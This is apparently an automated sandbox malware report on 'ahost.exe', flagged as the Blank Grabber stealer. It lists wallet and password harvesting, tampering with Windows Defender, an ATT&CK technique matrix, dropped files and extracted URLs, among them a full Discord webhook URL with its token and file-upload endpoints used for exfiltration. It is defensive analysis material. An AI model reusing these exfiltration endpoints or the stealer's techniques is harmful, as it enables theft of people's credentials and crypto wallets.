              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7272, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager58
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS261
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Masquerading
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Modify Registry
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
              Virtualization/Sandbox Evasion
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Access Token Manipulation
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
              Process Injection
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574323 Sample: ahost.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 70 ip-api.com 2->70 72 discord.com 2->72 74 blank-baxwq.in 2->74 82 Sigma detected: Capture Wi-Fi password 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 Yara detected Blank Grabber 2->86 88 11 other signatures 2->88 11 ahost.exe 22 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 62 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->62 dropped 64 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->64 dropped 66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->66 dropped 68 16 other files (none is malicious) 11->68 dropped 114 Modifies Windows Defender protection settings 11->114 116 Adds a directory exclusion to Windows Defender 11->116 118 Tries to harvest and steal WLAN passwords 11->118 120 2 other signatures 11->120 18 ahost.exe 1 72 11->18         started        80 127.0.0.1 unknown unknown 15->80 file6 signatures7 process8 dnsIp9 76 ip-api.com 208.95.112.1, 49713, 49721, 80 TUT-ASUS United States 18->76 78 discord.com 162.159.135.232, 443, 49722 CLOUDFLARENETUS United States 18->78 90 Found many strings related to Crypto-Wallets (likely being stolen) 18->90 92 Tries to harvest and steal browser information (history, passwords, etc) 18->92 94 Modifies Windows Defender protection settings 18->94 96 6 other signatures 18->96 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 18->27         started        29 35 other processes 18->29 signatures10 process11 signatures12 98 Suspicious powershell command line found 22->98 100 Uses cmd line tools excessively to alter registry or file data 22->100 102 Encrypted powershell cmdline option found 22->102 112 2 other signatures 22->112 31 powershell.exe 22->31         started        34 conhost.exe 22->34         started        104 Modifies Windows Defender protection settings 25->104 106 Removes signatures from Windows Defender 25->106 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 108 Adds a directory exclusion to Windows Defender 27->108 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        110 Tries to harvest and steal WLAN passwords 29->110 42 getmac.exe 29->42         started        44 systeminfo.exe 29->44         started        48 68 other processes 29->48 process13 file14 122 Loading BitLocker PowerShell Module 36->122 124 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->124 126 Writes or reads registry keys via WMI 42->126 56 C:\Users\user\AppData\Local\Temp\p92x0.zip, RAR 48->56 dropped 58 C:\Users\user\AppData\...\ohbt5slp.cmdline, Unicode 48->58 dropped 51 csc.exe 48->51         started        signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\ohbt5slp.dll, PE32 51->60 dropped 54 cvtres.exe 51->54         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              ahost.exe37%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.135.232
              truefalse
                ip-api.com
                208.95.112.1
                truetrue
                  blank-baxwq.in
                  unknown
                  unknownfalse
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMGfalse
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://github.com/Blank-c/BlankOBFahost.exe, 00000002.00000003.1414867373.000002162C0BE000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1413977247.000002162C414000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://www.avito.ru/ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpfalse
                            https://duckduckgo.com/ac/?q=ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://api.telegram.org/botahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                https://github.com/Blank-c/Blank-Grabberiahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                  https://www.ctrip.com/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                    https://github.com/urllib3/urllib3/issues/2168ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://support.mozilla.org/produahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://www.leboncoin.fr/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                            http://cacerts.digi?Sxahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://tools.ietf.org/html/rfc2388#section-4.4ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64ahost.exe, 00000002.00000003.1402625543.000002162BDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417086110.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1414363268.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1412497532.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://weibo.com/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://api.anonfiles.com/uploadahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        https://packaging.python.org/en/latest/specifications/entry-points/#file-formatahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            https://www.msn.comahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://discord.com/api/v9/users/ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    http://cacerts.digiahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://github.com/Blank-c/Blank-Grabberr#ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://peps.python.org/pep-0205/ahost.exe, 00000002.00000003.1397661863.000002162B9B1000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            https://www.reddit.com/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              https://github.com/urllib3/urllib3/issues/3020ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1401051914.000002162B9DF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        https://www.ebay.co.uk/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://www.ebay.de/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    https://go.micropowershell.exe, 00000046.00000002.1646857023.0000017B02214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://github.com/python/cpython/issues/86361.ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://crl.micpowershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://httpbin.org/ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://crl.ver)svchost.exe, 00000015.00000002.2645655275.0000021787484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://www.ecosia.org/newtab/ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://www.youtube.com/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                https://allegro.pl/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://MD8.mozilla.org/1/mahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadataahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://www.bbc.co.uk/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              https://bugzilla.moahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000015.00000003.1476407714.0000021787633000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://github.com/python/importlib_metadata/wiki/Development-Methodologyahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://google.com/mailahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://packaging.python.org/specifications/entry-points/ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871595223.000002162C540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            https://www.python.org/psf/license/)ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://www.google.com/ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://www.iqiyi.com/ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://foss.heptapod.net/pypy/pypy/-/issues/3539ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://google.com/ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://ocsp.sectigo.com0ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://tools.ietf.org/html/rfc7231#section-4.3.6)ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://api.gofile.io/getServerr~ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpfalse
